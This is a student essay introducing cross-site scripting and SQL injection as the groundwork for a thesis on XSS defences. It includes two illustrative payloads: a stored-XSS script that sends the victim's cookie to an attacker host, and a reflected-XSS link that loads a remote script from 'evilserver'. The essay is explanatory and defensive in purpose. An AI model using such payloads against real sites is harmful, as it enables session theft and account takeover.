Xss Web Vulnerability Identification Protection Computer Science Essay

Published:

This essay has been submitted by a student. This is not an example of the work written by our professional essay writers.

As social networking sites proliferate across the World Wide Web, complex user-created HTML content is rapidly becoming the norm rather than the exception. User-created web content is a notorious vector for cross-site scripting (XSS) attacks that target websites and confidential user data. In this threat climate, mechanisms that render web applications immune to XSS attacks have been of recent research interest. Cross site scripting (XSS) is a common security problem of web applications where an attacker can inject scripting code into the output of the application that is then sent to a user's web browser. In the web browser, this scripting code is executed and used to transfer sensitive data to a third party. Today's solutions attempt to prevent XSS on the server side, for example, by inspecting and modifying the data sent to and from the web application. For social networking sites the criticality of XSS attacks gets even higher because the hackers can try more socially engineered attacks where the target user can be fooled by thinking that an attack link is coming from his 'friend'. This research work will focus on defense mechanisms for cross-site scripting attacks. We will discuss several recent real-world XSS attacks and analyze the reasons for the failure of filtering mechanisms in defending these attacks. This thesis would describe/implement ways of identifying XSS vulnerabilities in Web2.0 based websites. Suggesting ways to prevent such loopholes would also be part of this thesis.

CHAPTER 1

Introduction

Web today has evolved and is still growing at a rapid pace. Complex business applications are now being delivered over the web. More and more people are using web every day. Many social networking sites have emerged as a result of this rapid growth. As more and more data, both secure and un-secure is available on the net it raises a serious concern about the security of cloud computing, social networking and other websites in general. Cyber criminals have become highly effective in stealing data and getting away with it, which makes organizations and businesses around the world more and more vulnerable to cyber crime attacks. Attackers have found new attacks to exploit vulnerabilities in web applications. Among these attacks cross-site scripting has received much attention in the recent scientific literature Cross-site scripting (XSS) attacks are the number-one security threat on the Internet today. These attacks breach confidentiality of sensitive data, undermine authorization schemes, defraud users, defame web sites, and more. Notably Facebook, LiveJournal, MySpace and Orkut have all been hit by these attacks.

Many web sites use open source web applications to provide certain services that are part of the web site. Web applications are not only used by private web site providers but also by companies and governmental institutions. If web applications are used to assemble web pages, the information contained in them can be gathered from various sources. One of the most important sources is data from the interaction of the user with the web page. The user clicks on links to decide which page is to be displayed next, requests information, leaves messages by filling out forms, or searches for something on the web site. Most often a database is used as the primary resource to retrieve information that is requested by the user.

To extract personal information from the web application, "SQL injection" can be used. In this kind of attack, information that is entered by the user is included in database queries that are used to extract content for the web page. Because the user input is not checked for malicious content, arbitrary SQL queries can be executed. These queries can then be used to circumvent safety procedures incorporated in the web application (e.g., bypass logins), retrieve personal data of customers (e.g., credit card numbers, social security numbers) or execute system commands on the targeted web server (e.g., to install malicious software on the server).

To use the web application as a platform to attack users, a special kind of attack called "Cross Site Scripting" (XSS) can be performed. Similar to the SQL injection scenario, malicious code is included in the information entered on the web site. The web application processes this information without checking it for HTML or scripting code and inserts it into the output of the web page that is delivered to the attacked user. The web browser (e.g., Mozilla Firefox) then displays the content of the web page and executes the malicious code in the context of the web site. The malicious program can therefore access sensitive data stored in the user's web browser (e.g., a cookie that can be accessed with document and transfer it without notice to a third party (i.e., a web site that is under control of the attacker). The attacker can thus collect information gathered by the script.

Fig.1 Interactions during a cross-site scripting attack

There are two methods for injecting code into the web page that is displayed to the user:

Stored XSS

Reflected XSS

Stored XSS Attack:

With a "Stored XSS" attack, the attacker stores malicious code in the web application. Later, the victim requests the page that contains this scripting code. A web based bulletin board system (e.g., phpBB [52]) where people can enter messages that are displayed to anyone interested in reading them can be used to implement this kind of attack. The attacker crafts a message such as the one in Figure 1.1, which contains the malicious JavaScript code and the bulletin board system stores it in its database. A victim reading the message downloads the scripting code of the attacker as part of the message. This code is executed in the web browser of the victim and transfers the cookie of the user to a web server that is controlled by the attacker.

Look at this picture!

<img src="image">

<script>

document.images[0].src = "http://evilserver/image.jpg"+"?stolencookie=" + document.cookie;

</script>

Example of a message for the "Stored XSS" attack that transfers the cookie

(e.g., credit card numbers of customers) or they use the web application as an attack vector on the visiting customer.

Reflected XSS Attack:

A "Reflected XSS" attack sends the malicious code back to the user with the help of the web application. To do this, the attacker sends a link to the victim (e.g., by email), similar to the one

<a href="http://goodserver/comment.cgi?mycomment=<script

src='http://evilserver/xss.js'></script>">Click here</a>

Above Example for a "Reflected XSS" attack with shows HTML code that contains a script to attack the receiver of the email. If the victim clicks on the link, the vulnerable web application displays the requested web page with the information passed to it in this link. This information contains the malicious code which is now part of the web page that is sent back to the web browser of the user, where it is executed.

Typically, advisories to prevent cross site scripting require that the web application providers ensure that their deployed software is not vulnerable. This can either be done during the web application development process by employing software design and implementation methods that produce more secure code, or when the application is already deployed on the web server. In case the web site owner uses third party products, the latest vendor patches have to be applied on a regular basis, or whenever they are published, to protect the web site's users. Unfortunately, it takes time to develop and test a patch for a newly found vulnerability. While working on the patch, the web site visitors are exposed to the threat. Most of the time, it is not apparent to the visitors whether or not the latest patches have been applied to the web application. Therefore, surfers on the Internet are constantly endangered to be the victim of a cross site scripting attack.

Writing Services

Essay Writing
Service

Find out how the very best essay writing service can help you accomplish more and achieve higher marks today.

Assignment Writing Service

From complicated assignments to tricky tasks, our experts can tackle virtually any question thrown at them.

Dissertation Writing Service

A dissertation (also known as a thesis or research project) is probably the most important piece of work for any student! From full dissertations to individual chapters, we’re on hand to support you.

Coursework Writing Service

Our expert qualified writers can help you get your coursework right first time, every time.

Dissertation Proposal Service

The first step to completing a dissertation is to create a proposal that talks about what you wish to do. Our experts can design suitable methodologies - perfect to help you get started with a dissertation.

Report Writing
Service

Reports for any audience. Perfectly structured, professionally written, and tailored to suit your exact requirements.

Essay Skeleton Answer Service

If you’re just looking for some help to get started on an essay, our outline service provides you with a perfect essay plan.

Marking & Proofreading Service

Not sure if your work is hitting the mark? Struggling to get feedback from your lecturer? Our premium marking service was created just for you - get the feedback you deserve now.

Exam Revision
Service

Exams can be one of the most stressful experiences you’ll ever have! Revision is key, and we’re here to help. With custom created revision notes and exam answers, you’ll never feel underprepared again.